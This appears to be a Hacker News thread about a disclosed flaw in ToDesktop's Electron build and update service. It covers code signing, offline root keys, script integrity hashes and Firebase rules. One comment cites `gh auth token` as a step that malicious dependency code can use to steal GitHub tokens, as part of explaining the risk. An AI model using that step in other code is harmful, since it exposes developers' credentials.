This service is a kind of "app store" for JS applications installed on desktop machines. Their service hosts download assets, with a small installer/updater application running on the users' desktop that pulls from the download assets.
The vulnerability worked like this: the way application publishers interact with the service is to hand it a typical JS application source code repo, which the service builds, in a container in typical CI fashion. Therefore the app publisher has complete control over the build environment.
Meanwhile, the service performs security-critical operations inside that same container, using credentials from the container image. Furthermore, the key material used to perform these operations is valid for all applications, not just the one being built.
These two properties of the system: 1. build system trusts the application publisher (typical, not too surprising) and 2. build environment holds secrets that allow compromise of the entire system (not typical, very surprising), over all publishers not just the current one, allow a malicious app publisher to subvert other publishers' applications.
My goodness. So much third-party risk upon risk and lots of external services opening up this massive attack surface and introducing this RCE vulnerability.
From an Electron bundler service, to sourcemap extraction and now an exposed package.json with the container keys to deploy any app update to anyone's machine.
This isn't the only one, the other day Claude CLI got a full source code leak via the same method from its sourcemaps being exposed.
But once again, I now know why the entire Javascript / TypeScript ecosystem is beyond saving given you can pull the source code out of the sourcemap and the full credentials out of a deployed package.json.
Blaming Js/Ts is ridiculous. All those same problems exist in all environments. Js/Ts is the biggest so it gets the most attention but if you think it's different in any other environment you're fooling yourself.
> But once again, I now know why the entire Javascript / TypeScript ecosystem is beyond saving given you can pull the source code out of the sourcemap and the full credentials out of a deployed package.json.
You've always been able to do the first thing though: the only thing you can do is obfuscate the source map, but it's not like that's a substantial slowdown when you're hunting for authentication points (identify API URLs, work backwards).
And things like credentials in package.json are just a sickness which is global to computing right now: we have so many ways you can deploy credentials, basically 0 common APIs which aren't globals (files or API keys), and even fewer security tools which acknowledge the real danger (protecting me from my computer's system files is far less valuable than protecting me from code pretending to be me as my own user - where all the real valuable data already is).
Basically I'm not convinced our security model has ever truly evolved beyond the 1970s, where the danger was "you damage the expensive computer" rather than "the data on the computer is worth orders of magnitude more than the computer".
I'm shocked at how insecure most software is these days. Probably 90% of software built by startups has a critical vulnerability. It seems to keep getting worse year on year. Before, you used to have to have deep systems knowledge to trigger buffer overflows. It was more difficult to find exploits. Nowadays, you just need basic understanding of some common tools, protocols and languages like Firebase, GraphQL, HTTP, JavaScript. Modern software is needlessly complicated and this opens up a lot of opportunities.
> [please don't] make it seem like it's their fault, it's not. it's todesktop's fault if anything
What?! It's not some kind of joke. This could _already_ literally kill people, steal money and ruin lives.
It isn't even an option for any app owner/author to avoid taking responsibility for the decisions which affect the security and safety of users.
It's as simple as this: no safety record to 3rd party - no trust, for sure. No security audit - no trust. No transparency in the audit - no trust.
Failing to make the right decision does not exempt from the liability, and should not.
Is it a kindergarten with "it's not me, it's them" play? It does not matter who failed; the money could already have been stolen from random people (who just installed an app wrapped with this todesktop installer), and journalists could have been tracked and probably already killed in some dictatorship or conflict.
Bad decisions do not always make a bad owner.
But don't take it lightly, and don't advocate (for those who just paid you some money) "oh, they are innocent". As they are not. Be a grown-up, please, and let's make this world better together.
The problem is that this entire sclerotic industry is so allergic to accountability, that, if you want people to start, you probably have to fire 90% of the workforce. If it were up to me, the developers responsible for this would never write software "professionally" again.
The industry (or a couple of generations currently inhabiting it) could start with at least accepting responsibility when something goes wrong. Let me be clear: it's not about ending the "blameless culture" in engineering. No. It's about ending the culture of not taking any responsibility at all, when things go south. See the difference.
> security incidents happen all the time, its natural. what matters is the company's response, and todesktop's response has been awesome, they were very nice to work with.
it’s a blog. people regularly use their personal sites to write in a tone and format that they are fond of. i only normally feel like i see this style from people who were on the internet in the 90s. i’d imagine we would see it even more if phones and auto correct didn’t enforce a specific style. imagine being a slave to the shift key. it can’t even fight back! i’m more upset the urls aren’t actually clickable links.
Finding an RCE for every computer running cursor is cool, and typing in all lowercase isn’t that cool. Finding an RCE on millions of computers has much much higher thermal mass than typing quirks, so the blog post makes typing in all lowercase cool.
I can't post things like "what a bunch of clowns" due to hacker news guidelines so let me go by another more productive route.
These people, the ones who install dependencies (that install dependencies)+, these people who write apps with AI, who in the previous season looped between executing their code and searching the error on stackoverflow.
Whether they work for a company or have their own startup, the moment that they start charging money, they need to be held liable when shit happens.
When they make it their business model or employability advantage to take free code on the internet, add pumpkin spice and charge cash for it, they cross the line from pissing off passionate hackers by defiling our craft, to dumping in the pool and ruining it for users and us.
It is not sufficient to write somewhere in a contract that something is as is and we hold harmless and this and that. Buddy if you download an ai tool to write an ai tool to write an ai tool and you decided to slap a password in there, you are playing with big guns, if it gets leaked, you are putting other services at risk, but let's call that a misdemeanor. Because we need to reserve something stronger for when your program fails silently, and someone paid you for it, and they relied on your program, and acted on it.
That's worse than a vulnerability, there is no shared responsibility, at least with a vuln, you can argue that it wasn't all your fault, someone else actively caused harm. Now are we to believe the greater risk of installing 19k dependencies and programming ai with ai is vulns? No! We have a certainty, not a risk, that they will fuck it up.
Eventually we should license the field, but for now, we gotta hold devs liable.
Give those of us who do 10 times less, but do it right, some kind of marketing advantages, it shouldn't be legal that they are competing with us. A vscode fork got how much in VC funding?
My brothers, let's take up arms and defend. And defend quality software, I say. Fear not writing code, fear not writing raw html, fear not, for they don't feel fear so why should you?
As an Electron maintainer, I'll re-iterate a warning I've told many people before: Your auto-updater and the underlying code-signing and notarization mechanisms are sacred. The recovery mechanisms for the entire system are extremely painful and often require embarrassing emails to customers. A compromised code-sign certificate is close to the top of my personal nightmares.
Dave and toDesktop have build a product that serves many people really well, but I'd encourage everyone building desktop software (no matter how, with or without toDesktop!) to really understand everything involved in compiling, signing, and releasing your builds. In my projects, I often make an argument against too much abstraction and long dependency chain in those processes.
If you're an Electron developer (like the apps mentioned), I recommend:
* Build with Electron Forge, which is maintained by Electron and uses @electron/windows-sign and @electron/osx-sign directly. No magic.
* For Windows signing, use Azure Trusted Signing, which signs just-in-time. That's relatively new and offers some additional recovery mechanisms in the worst case.
* You probably want to rotate your certificates if you ever gave anyone else access.
* Lastly, you should probably be the only one with the keys to your update server.
How about we don't build an auto-updater? Maybe some apps require an extremely tight coupling with a server, but we should try our best to release complete software to users that will work as close to forever as possible. Touching files on a user's system should be treated as a rare special occurrence. If a server is involved with the app, build a stable interface and think long and hard about every change. Meticulously version and maintain everything. If a server is involved, it is completely unacceptable for a server-side change to break an existing user's local application unless it is impossible to avoid - it should be seen as an absolute last resort with an apology to affected customers (agree with OP on this one).
It is your duty to make sure _all_ of your users are able to continue using the same software they installed in exactly the same way for the reasonable lifetime of their contract, the package, or underlying system (and that lifetime is measured in years/decades, with the goal of forever where possible. Not months).
You can, if you must, include an update notification, but this absolutely cannot disrupt the user's experience; no popups, do not require action, include an "ignore forever" button. If you have a good product with genuinely good feature improvements, users will voluntarily upgrade to a new package. If they don't, that is why you have a sales team.
Additionally, more broadly, it is not your app's job to handle updates. That is the job of your operating system and its package manager. But I understand that Windows is behind in this regard, so it is acceptable to compromise there.
We go a step further at my company. Any customer is able to request any previous version of their package at any time, and we provide them an Internet download page or overnight ship them a CD free of charge (and now USB too).
> Maybe some apps require an extremely tight coupling with a server, but we should try our best to release complete software to users that will work as close to forever as possible.
That sounds like a good idea. Unless you’re the vendor, and instead of 1000 support requests for version N, you’re now facing 100 support requests for version N, 100 for N−1, 100 for N−2, …, and 100 for N−9.
Have been there, done that.
The answer is a support window. If they are in bounds and have active maintenance contracts, support them.
If not, give them an option to get on support, or wish them luck.
Then the other answer is to really think releases through.
None of it is cheap. But it can be managed.
You're allowed to have a support matrix. You can refuse to support versions that are too old, but you can also just... let people keep using programs on their own computers.
Yep.
And anyone who does will find a percentage of users figure it out and then just get back to work.
Sounds like you come from the B2B, consultancyware or 6÷ figure/year license world.
For the vast realm of <300$/year products, the ones that actually use updaters, all your suggestions are completely unviable.
And it's not like B2B doesn't get whacked by bad software or bad actors regulalry. The idea that software updates itself is vastly more benefitial than harmful in the very long term. There so many old machines running outdated software in gated corporate networks, they will get owned immediately once a single one of them is compromised in any way. They are literally trading minor inconveniences for a massive time-bomb with a random timer.
The two sides of your thought are going head to head. "Gated corporate networks" don't benefit from software that "updates itself" (unless we're talking about pure SaaS). It's exactly where auto-updating is completely useless because any company with a functioning IT will go out of its way to not delegate the decisions of when to update or what features are forced in out to the developer and their product manager.
Auto-updates mostly ever practically happen for software used at home or SMB which might not have a functioning IT. If security is the concern why not use auto-updates only for security updates? Why am I gaining features I explicitly did not want, or losing the ones which were the reason I bought the software in the first place? Why does the dev think I am not capable of deciding for myself if or when to update? I have a solid theory of why and it involves an MBA-type person thinking anyone using <$300 software just can't think for themselves and if this line of thought cuts some costs or generates some revenue all the better.
> How about we don't build an auto-updater?
Sure. I’d rather have it be provided by the platform. It’s a lot of work to maintain for 5 OSs (3 desktop, 2 mobile).
> we should try our best to release complete software to users that will work as close to forever as possible
This isn’t feasible. Last I tried to support old systems on my app, the vendor (Apple) had stopped supporting and didn’t even provide free VMs. Windows 10 is scheduled for non-support this year (afaik). On Linux glibc or gtk will mess with any GUI app after a few years. If Microsoft, Google and Apple can’t, why the hell should I as a solo app developer? Plus, I have 5 platforms to worry about, they only have their own.
> Touching files on a user's system should be treated as a rare special occurrence.
Huh? That’s why I built an app and not a website in the first place. My app is networked both p2p and to api and does file transfers. And I’m supposed to not touch files?
> If a server is involved with the app, build a stable interface and think long and hard about every change.
Believe me, I do. These changes are as scary as database migrations. But like those, you can't avoid them forever. And for those cases, you need at the very least to let the user know what’s happening. That’s half of the update infrastructure.
Big picture, I can agree with the sentiment that ship fast culture has gone too far with apps and also we rely on cloud way too much. That’s what the local first movement is about.
At the same time, I disagree with the generalization seemingly based on a narrow stereotype of an app. For most non-tech users, non-disruptive background updates are ideal. This is what iOS does overnight when charging and on WiFi.
I have nothing against disabling auto updates for those who like to update their own software, but as a default it would lead to massive amounts of stale non-working software.
> file transfers. And I’m supposed to not touch files?
I'm pretty sure you know what I meant, it's obvious from context. System program files. The files that are managed by your user's package manager (and by extension their IT department)
There isn’t a package manager in many cases: windows store requires a MS account. macOS app store nerfs apps by sandbox restrictions. Linux has so many flavors of package managers it’s death by 1000 paper cuts. None of the major bundlers like flutter, electron and tauri support all these package managers and/or app stores. Let alone running the infrastructure for it.
Which leaves you with self-updaters. I definitely agree that ideally it shouldn't be the application's job to update itself. But we don't live in that world atm. At the very least you need update checks and EOL circuit breakers for apps that aren't forever-local-only apps. Which is not a niche use case, even if local-first infra were mature and widely adopted, which it very much isn't.
Anyway, my app works without internet, pulls no business logic at runtime (live updates) and it uses e2ee for privacy. That's way more than the average ad-funded bait-and-switch ware that plagues the majority of commercial software today. I wish I didn't have to worry about updates, but the path to fewer worries and a healthy ecosystem is not to build bug-free forever-software on top of a constantly moving substrate provided largely by corporations with multiple orders of magnitude more funding than the average software development company.
I do agree with you, but I think that unfortunately you are wrong about whose job updates are. You have an idealistic vision that I share, but well, it remains idealistic.
Apart from, maybe, Linux distros, neither Apple nor Microsoft provides anything to handle updates that isn't a proprietary store with shitty rules.
For sure the rules are broken on desktop OSs, but in the meantime you still have to distribute and update your software. Should the update be automatic? No. Should you provide an easy way to update? I'd say that in the end it depends on whether you think it's important to provide updates to your users. But should you expect your users or their OSs to somehow update your app by themselves? Nope.
This is actually precisely how package management works in Linux today... you release new versions, package maintainers package and release them, while ensuring they actually work. This is a solved problem; it's just that nobody writing JavaScript is old enough to realize it's an option.
And that's why I said "apart from, maybe, Linux distros". Where are the package maintainers on the OSes everyone uses? (And that's not sarcasm, I'm writing this comment on my Linux desktop.)
Homebrew and chocolatey?
My exact thought as well, simply point the user to a well established and proper channel for auto updates and then the dev simply needs to upload/release to said repos when a new version is put out. As an aside: Chocolatey is currently the only (stable/solid) way to consistently keep things up to date on the Win platform in my book.
Windows Store and winget. Developers are the ones behind the times.
This one is right.
Have a shoe-box key, a key which is copied 2*N (redundancy) times and N copies are stored in 2 shoe-boxes. It can be on tape, or optical, or silicon, or paper. This key always stays offline. This is your rootiest of root keys in your products, and almost nothing is signed by it. The next key down which the shoe-box key signs (ideally, the only thing) is for all intents and purposes your acting "root certificate authority" key running hot in whatever highly secure signing enclave you design for any other ordinary root CA setup. Then continue from there.
Your hot and running root CA could get totally pwned, and as long as you had come to Jesus with your shoe-box key and religiously never ever interacted with it or put it online in any way, you can sign a new acting root CA key with it and sign a revocation for the old one. Then put the shoe-box away.
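Roughly, with plain OpenSSL (a minimal sketch: names, algorithm and lifetimes are illustrative, a real CA also needs proper basicConstraints/extensions, and the hot key belongs in an HSM or equivalent):

    # 1. Generate the "shoe-box" root once, offline. Copy it to your media of
    #    choice and never let it touch a networked machine again.
    openssl genpkey -algorithm ed25519 -out shoebox-root.key
    openssl req -x509 -new -key shoebox-root.key -days 7300 \
      -subj "/CN=Example Offline Root" -out shoebox-root.crt

    # 2. Generate the hot signing key that does the day-to-day work, and have
    #    the shoe-box root sign it exactly once.
    openssl genpkey -algorithm ed25519 -out hot-ca.key
    openssl req -new -key hot-ca.key -subj "/CN=Example Hot Signing CA" -out hot-ca.csr
    openssl x509 -req -in hot-ca.csr -CA shoebox-root.crt -CAkey shoebox-root.key \
      -CAcreateserial -days 365 -out hot-ca.crt

    # 3. If the hot key is ever compromised: bring the shoe-box key out once,
    #    sign a replacement and a revocation, then put it away again.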
I mean, sure, but is that possible for OS builds? Generally you will generate a private key, get a cert for it, give it to Apple so they sign it with their key, and then you use the private key to sign your build. I have never seen a guide do a two-level process and I am not convinced it is allowed.
> It can be on tape, or optical, or silicon, or paper.
You can pick up a hardware security module for a few thousand bucks. No excuse not to.
I see a good excuse right there: the few thousand bucks.
I'd rather use one of the most reliable and cheap hardware security modules we know of: paper.
Print a bunch of QR/datamatrix codes with your key. Keep one in a fireproof safe in your house, and another one elsewhere.
Total cost: ~$0.1 (+ the multipurpose safe, if needed)
Printers often have hard drives with cached pages
That's why you buy a printer, then destroy it with a baseball bat after you print.
It is a bit expensive when it gets to 5-10 printers but still cheaper than the thousands.
Question.
I've noticed a lot of websites import from other sites, instead of local.
<script src="scriptscdn.com/libv1.3">
I almost never see a hash in there. Is this as dangerous as it looks, why don't people just use a hash?
1. Yes
2. Because that requires you to know how to find the hash and add it.
Truthfully the burden should be on the third party that's serving the script (where did you copy that HTML from in the first place?), but they aren't incentivized to have other sites use a hash.
Well, to be honest, the browsers could super easily solve that. In dev mode, just issue a warning "loaded script that has hash X but isn't statically defined. This is a huge security risk. Read more here" and that's it. Then you can just add the script, run the site, check the logs and add the hash, done.
You can define a CSP header to only exec 3rd Party scripts with known hashes
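Something like this (hashes are placeholders; there are caveats around how browsers apply hash sources to external scripts, so treat it as a sketch):

    <!-- per-tag check: the browser refuses to run the file if its hash
         doesn't match the integrity attribute -->
    <script src="https://scriptscdn.com/libv1.3"
            integrity="sha384-BASE64_HASH_OF_THE_EXPECTED_FILE"
            crossorigin="anonymous"></script>

And/or enforced more broadly via a response header:

    Content-Security-Policy: script-src 'self' 'sha384-BASE64_HASH_OF_THE_EXPECTED_FILE'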
But that doesn't make it easy to integrate a new script from an author who doesn't provide the hash already.
I wish popular browsers would get together and release an update that says:
- After version X, we will display a prominent popup if a script isn't loaded with a hash
- After version Y, we will block scripts loaded without hashes
They could solve this problem in a year or so, and if devs are too lazy to specify a hash when loading scripts then their site will break.
Yes it is. Hashes must absolutely be used in that case.
It should just not be done at all. But the main browser vendor loves tracking so they won't forbid this.
Are you saying Chrome should block all script includes that don't have hashes? That'll break tons of sites. See "Don't break the web"[1].
Disclosure: I work at Google, but not on Chrome.
[1] https://flbrack.com/posts/2023-02-15-dont-break-the-web/
Maybe, but just from a security point of view it's totally fine.
Getting tracked is less secure than not getting tracked.
Getting hacked is less secure than getting tracked.
> No magic.
There's plenty of magic. I think that Electron Forge does too many things, like trying to be the bundler. Is it possible to set up a custom build system / bundling with it or are you forced to use Vite? I guess that even if you can, you pull all those dependencies when you install it and naturally you can't opt out from that. Those dev dependencies involved in the build process are higher impact than some production dependencies that run in a sandboxed tab process (because a tiny malicious dependency could insert any code into the app's fully privileged process). I have not shipped my app yet, but I am betting on ESBuild (because it's just one Go binary) and Electron Builder (electron.build)
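For what it's worth, the esbuild side of that bet is tiny - a sketch (entry points and options are placeholders for whatever your app actually needs):

    // build.mjs - minimal sketch; run with `node build.mjs`
    import { build } from 'esbuild';

    await build({
      entryPoints: ['src/main.ts', 'src/preload.ts'], // hypothetical entry points
      bundle: true,
      platform: 'node',       // main & preload run in Electron's Node context
      external: ['electron'], // provided at runtime, don't bundle it
      outdir: 'dist',
      sourcemap: true,
    });

Electron Builder then packages whatever that produces, according to its own config.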
Hi. I'm an electron app developer. I use electron builder paired with AWS S3 for auto update.
I have always put Windows signing on hold due to the cost of a commercial certificate.
Is the Azure Trusted Signing significantly cheaper than obtaining a commercial certificate? Can I run it on my CI as part of my build pipeline?
Azure Trusted Signing is one of the best things Microsoft has done for app developers last year, I'm really happy with it. It's $9.99/month and open both to companies and individuals who can verify their identity (it used to only be companies). You really just call signtool.exe with a custom dll.
I wrote @electron/windows-sign specifically to cover it: https://github.com/electron/windows-sign
Reference implementation: https://github.com/felixrieseberg/windows95/blob/master/forg...
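Under the hood it boils down to calling signtool with the Trusted Signing dlib - roughly this (flag names and file paths are from the docs as I remember them, so treat it as a sketch and double-check):

    rem metadata.json holds your Trusted Signing endpoint, account name and
    rem certificate profile; the dlib ships with the Trusted Signing client tools.
    signtool.exe sign /v /fd SHA256 ^
      /tr "http://timestamp.acs.microsoft.com" /td SHA256 ^
      /dlib "Azure.CodeSigning.Dlib.dll" ^
      /dmdf "metadata.json" ^
      MyApp.exe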
The big limitation with Azure Trusted Signing is that your organization needs to be at least 3 years old. Seems to be a weird case where developers that could benefit from this solution are pushed towards doing something else, with no big reason to switch back later.
That limitation should go away when Trusted Signing graduates from preview to GA. The current limitation is because the CA rules say you must perform identity validation of the requester for orgs younger than 3 years old, which Microsoft isn't set up for yet.
This is not true. Or maybe it is but they missed me? I signed up with a brand new company without issue.
Hi. This is very helpful. Thanks for sharing!
> For Windows signing, use Azure Trusted Signing
I recently checked it out as an alternative to renewing our signing cert, but it doesn't support issuing EV certs.
My understanding is that an EV code signing cert on Windows is required for drivers, but it somehow also gives you better SmartScreen reputation, making it useful even for user-space apps in enterprisey settings?
Not sure if this is FUD spread by the EV CAs or not, though?
I'm not sure if they're technically considered EV, but mine is linked to my corporation and I get no virus warnings at all during install.
[flagged]
And yet, tons of developers install github apps that ask for full permissions to control all repos and can therefore do the same things to every dev using those services.
github should be ashamed this possibility even exists, and doubly ashamed that their permission system and UX is so poorly conceived that it leads apps to ask for all the permissions.
IMO, github should spend significant effort so that the default is to present the user with a list of repos they want some github integration to have permissions for, and then for each repo, the specific permissions needed. It should be designed so that minimal permissions are encouraged.
As it is, the path of least resistance for app devs is "give me root" and for users to say "ok, sure"
Why spend that effort when any code you run on your machine (such as dependency post-install scripts, or the dependencies themselves!) can just run `gh auth token` and grab a token for all the code you push up?
By design, the gh cli wants write access to everything on github you can access.
I will note that at least for our GitHub enterprise setup permissions are all granular, tokens are managed by the org and require an approval process.
I’m not sure how much of this is “standard” for an org though.
I personally haven't worked with many of the github apps that you seem to refer to but the few that I've used are only limited to access the specific repositories that I give and within those repositories their access control is scoped as well. I figured this is all stuff that can be controlled on Github's side. Am I mistaken?
Yeah, turns out "modern" software development has more holes than Swiss cheese. What else is new?
You know, there's this nice little thing called AppStore on the mac, and it can auto update
All apps on the Mac AppStore have to be sandboxed, which is great for the end-user, but a pain in the neck for the run of the mill electron app dev.
A question that I hope you can help me with. I'm working on an Electron app that works offline. I plan to sell it cheap, like a $5 one-time payment.
It won't have licenses or anything, so if somebody wants to distribute it outside my website they will be able to do it.
If I just want to point to an exe file link in S3 without auto updates, should just compiling and uploading be enough?
Dave here, founder of ToDesktop. I've shared a write-up: https://www.todesktop.com/blog/posts/security-incident-at-to...
This vulnerability was genuinely embarrassing, and I'm sorry we let it happen. After thorough internal and third-party audits, we've fundamentally restructured our security practices to ensure this scenario can't recur. Full details are covered in the linked write-up. Special thanks to Eva for responsibly reporting this.
> cannot happen again.
Hubris. Does not inspire confidence.
> We resolved the vulnerability within 26 hours of its initial report, and additional security audits were completed by February 2025.
After reading the vulnerability report, I am impressed at how quickly you guys jumped on the fix, so kudos. Did the security audit lead to any significant remediation work? If you weren't following PoLP, I wonder what else may have been overlooked?
Fair point. Perhaps better phrased as "to ensure this scenario can't recur.". I'll edit my post.
Yes, we re-architected our build container as part of remediation efforts, it was quite significant.
That was solid. Nice way to handle a direct personal judgement!
Not your first rodeo.
Another way is to avoid absolutes and ultimatums as aggressively as one should avoid personal judgements.
Better phrased as: "we did our best to prevent this scenario from happening again."
Fact is it just could happen! Nobody likes that reality, and overall when we think about all this stuff, networked computing is a sad state of affairs..
Best to just be 100 percent real about it all, if you ask me.
At the very least people won't nail you on little things, which leaves you something you may trade on when a big thing happens.
And yeah, this is unsolicited and worth exactly what you paid. Was just sharing where I ended up on these things in case it helps
Based on the claims on the blog, it feels reasonable to say that this "cannot" occur again.
Based on which claim? That 12 months from now they might accidentally discover a new bug just as serious?
If you think someone is obviously wrong, it might be worth pausing for a second and considering where you might just be referring to different things. Here, you seem to understand “this” to mean “a serious bug.” Since it’s obvious that a serious bug could happen, it seems likely that the author meant “this” to mean “the kind of bug that led to the breach we’re presently discussing.”
[flagged]
This is the wrong response, because that would mean the learning gets lost. The security community didn't want that to happen when one of the CAs got a vulnerability, and we don't want it to happen to other companies. We want companies to succeed and get better; shaming doesn't help with that. Learning the right lessons does, and resigning means you are learning the wrong ones.
I don't think the lesson is lost. The opposite.
If you get a slap on the wrist, do you learn? No, you play it down.
However if a dev who gets caught doing a bad is forced to resign. Then all the rest of the devs doing the same thing will shape up.
I suggest reading one or two of Sydney Dekker’s books, which are a pretty comprehensive takedown of this idea. If an organization punishes mistakes, mistakes get hidden, covered up, and no less frequent.
Is it Dekker?
https://www.goodreads.com/book/show/578243.Field_Guide_to_Hu...
Sure is, autocorrect got me.
> If you get a slap on the wrist, do you learn? No, you play it down.
Except Dave didn't play it down. He's literally taking responsibility for a situation that could have resulted in significantly worse consequences.
Instead of saying, "nothing bad happened, let's move on," he, and by extension his company, have worked to remedy the issue, done a write-up on it, disclosed the issue and its impact to users, and publicly apologized and held themselves accountable. That right there is textbook engineering ethics 101 being followed.
> However if a dev who gets caught doing a bad is forced to resign.
then nearly everyone involved has an incentive to cover up the problem or to shift blame
Under what theory of psychology are you operating? This is along the same lines as the theory that punishment is an effective deterrent of crime, which we know isn’t true from experience.
While I think that resigning is stupid here, asserting that "punishment doesn't deter crime" is just absurd. It does!
The overwhelming majority of evidence suggests otherwise.
https://www.psychologytoday.com/us/blog/crime-and-punishment...
https://www.unsw.edu.au/newsroom/news/2020/07/do-harsher-pun...
https://www.ojp.gov/pdffiles1/nij/247350.pdf
https://www.helsinki.fi/en/news/economics/do-harsh-punishmen...
> While I think that resigning is stupid here, asserting that "punishment doesn't deter crime" is just absurd. It does!
Punishment does not deter crime. The threat of punishment does to a degree.
IOW, most people will be unaware of a person being sent to prison for years until and unless they have committed a similar offense. But everyone is aware of repercussions possible should they violate known criminal laws.
Can you back up your theory with examples of mistakes you have committed and forced resignations that followed?
this is probably one of the worst takes i've ever read on here
Honestly I don't get why people are hating this response so much.
Life is complex and vulnerabilities happen. They quickly contacted the reporter (instead of sending email to spam) and deployed a fix.
> we've fundamentally restructured our security practices to ensure this scenario can't recur
People in this thread seem furious about this one and I don't really know why. Other than needing to unpack some "enterprise" language, I view this as "we fixed some shit and got tests to notify us if it happens again".
To everyone saying "how can you be sure that it will NEVER happen", maybe because they removed all full-privileged admin tokens and are only using scoped tokens? This is a small misdirection, they aren't saying "vulnerabilities won't happen", but "exactly this one" won't.
So Dave, good job to your team for handling the issue decently. Quick patches and public disclosure are also more than welcome. One tip I'd learn from this is to use less "enterprise" language in security topics (or people will eat you in the comments).
Thank you.
Point taken on enterprise language. I think we did a decent job of keeping it readable in our disclosure write-up but you’re 100% right, my comment above could have been written much more plainly.
Our disclosure write-up: https://www.todesktop.com/blog/posts/security-incident-at-to...
> We have reviewed logs and inspected app bundles.
Were the logs independent of firebase? (Could someone exploiting this vulnerability have cleaned up after themselves in the logs?)
Annual pen tests are great, but what are you doing to actually improve the engineering design process that failed to identify this gap? How can you possibly claim to be confident this won't happen again unless you myopically focus on this single bug, which itself is a symptom of a larger design problem?
These kinds of "never happen again" statements never age well, and make no sense to even put forward.
A more pragmatic response might look like: something similar can and probably will happen again, just like any other bugs. Here are the engineering standards we use ..., here is how they compare to our peers our size ..., here are our goals with it ..., here is how we know when to improve it...
How can -let's say- Cursor users be sure they were not compromised?
> No malicious usage was detected
Curious to hear about methods used if OK to share, something like STRIDE maybe?
from todesktop's report:
> Completed a review of the logs. Confirming all identified activity was from the researcher (verified by IP Address and user agent).
With privileged access, the attackers can tamper with the evidence for repudiation, so although I'd say "nothing in the logs" is acceptable, not everyone may. These two attack vectors are part of the STRIDE threat modeling approach.
They don't elaborate on the logging details, but certainly most good systems don't allow log tampering, even for admins.
How confident are you that their log system is resilient, given the state of the rest of their software?
What horrible form not contacting affected customers right away after performing the patch.
Who knows what else was vulnerable in your infrastructure when you leaked .encrypted like that.
It should have been on your customers to decide if they still wanted to use your services.
how much of a bounty was paid to Eva for this finding?
> they were nice enough to compensate me for my efforts and were very nice in general.
They were compensated, but the post doesn't elaborate.
Sounds like it was handled better than the author's last article, where the Arc browser company initially didn't offer any bounty for a similar RCE, then awarded a paltry $2k after getting roasted, and finally bumped it up to $20k after getting roasted even more.
They later updated their post, at the bottom:
> for those wondering, in total i got 5k for this vuln, which i dont blame todesktop for because theyre a really small company
$50,000 in addition to the first $5,000 :)
Woooowwww!
See latest line: "update: cursor (one of the affected customers) is giving me 50k USD for my efforts."
> for those wondering, in total i got 5k for this vuln
no offense man but this is totally inexcusable and there is zero chance i am ever touching anything made by y'all, ever
Good call. I'd seriously considering firing the developers responsible, too.
That's what a bad manager would do.
The employee made a mistake and you just paid for them to learn about it. Why would you fire someone you just educated?
[flagged]
It’s not a matter of good or bad, but a choice among alternatives?
Nobody gets fired: learning opportunity for next time, but little direct incentive to improve.
Fire someone: accountability theater (who is really responsible), loss of knowledge.
AFAIK, blameless postmortems and a focus on mechanisms to prevent repeats seems like the best we’ve come up with?
[dead]
This should be considered criminal negligence.
Don't worry man, it's way more embarrassing for the people that downloaded your dep or any upstream tool.
If they didn't pay you a cent, you have no liability here.
This is not how the law works anywhere, thankfully.
Well for one it was a gift so there is no valid contract right? There are no direct damages because there is nothing paid and nothing to refund. Wrt indirect damages, there's bound to be a disclaimer or two, at least at the app layer.
IANAL, not legal advice
If you give someone a bomb, or give someone a USB stick with a virus, or give someone a car with defective brakes, you are absolutely liable. Think about it.
I’d suppose there is an ALL CAPS NO WARRANTY clause as well, as is customary with freeware (and FOSS). ToDesktop is a paid product, though.
This is the second big attack found by this individual in what... 6 months? The previous exploit (which was in Arc browser), also leveraged a poorly configured firebase db: https://kibty.town/blog/arc/
So this is to say, at what point should we start pointing the finger at Google for allowing developers to shoot themselves in the foot so easily? Granted, I don't have much experience with firebase, but to me this just screams something about the configuration process is being improperly communicated or overall is just too convoluted as a whole.
Firebase lets anyone get started in 30 seconds.
Details like proper usage, security, etc. Those are often overlooked. Google isn't to blame if you ship a paid product without running a security audit.
I use firebase essentially for hobbyist projects for me and my friends.
If I had to guess these issues come about because developers are rushing to market. Not Google's fault ... What works for a prototype isn't production ready.
> Google isn't to blame if you ship a paid product without running a security audit.
Arguably, if you provide a service that makes it trivial to create security issues (that is to say, you have to go out of your way to use it correctly) then it's your fault. If making it secure means making it somewhat less convenient, it's 100% your fault for not making it less convenient.
What if I need to hack together a POC for 3 people to look at?
It's my responsibility to make sure when we scale from 3 users to 30k users we take security seriously.
As my old auto shop teacher used to say, if you try to idiot proof something they'll build a better idiot.
Even if Google warns you in big bold print "YOU ARE DOING SOMETHING INSECURE", someone out there is going to click deploy anyway. You're arguing Google disable the deploy button, which I simply disagree with.
I think that's throwing the baby out with the bathwater; sane defaults are still an important thing to think about when developing a product. And for something as important as a database, which usually requires authentication or storing personal information, let your tutorials focus on these pain points instead of the promise of a database-driven app with only clientside code. It's awesome, but I think it deserves the notoriety for letting you shoot yourself in the foot and landing on the front page of HN. Author also found a similar exploit via Firebase for the Arc Browser[0]
I have a similar qualm with GraphQL.
[0] https://kibty.town/blog/arc/
I don't know what exactly happened here, but Firebase has two defaults. Test access rules which auto expire and are insecure, or production rules which require auth.
If you do something stupid, like keep ignoring the insecure warning and updating them so they don't expire, that's your fault.
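For reference, the two defaults look roughly like this (the expiry date is just whatever the console fills in when you create the project):

    // "Test mode": wide open until the expiry date, with a big warning in the console.
    rules_version = '2';
    service cloud.firestore {
      match /databases/{database}/documents {
        match /{document=**} {
          allow read, write: if request.time < timestamp.date(2025, 3, 30);
        }
      }
    }

    // "Production mode": deny everything until you write real rules.
    rules_version = '2';
    service cloud.firestore {
      match /databases/{database}/documents {
        match /{document=**} {
          allow read, write: if false;
        }
      }
    }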
In no other industry do workers blame their tools.
The issue usually lies in there not being enough security rules in place, not in keeping insecure rules active. For instance, for the Arc incident which we were given more information on, it was due to not having a security rule in place to prevent unauthorized users from updating the user_id on Arc Boosts in the Firestore.
Go into any other industry and hear when they say, "shoot yourself in the foot", and you've likely stumbled upon a situation where they blame their tools for making it too easy to do the wrong thing.
If you don't setup any access rules in Firebase, by default it'll deny access.
This means someone set up these rules improperly. Even then, you're responsible for the tools you use. We're a bunch of people getting paid 150k+ to type. It's not out of the question to read documentation and at a minimum understand how things work.
That said I don't completely disagree with you, if Firebase enables reckless behavior maybe it's not a good tool for production...
And I don't necessarily disagree either; good callout that it _was_ about improperly configured ACL's, I meant more that it wasn't related to keeping test rules alive.
For 150k+ salaries, frontend dev salaries are generally a lot less than their backend counterparts. And scrappy startups might not have cash for competitive salaries or senior engineers. I think these are a few of the reasons why Firebase becomes dangerous.
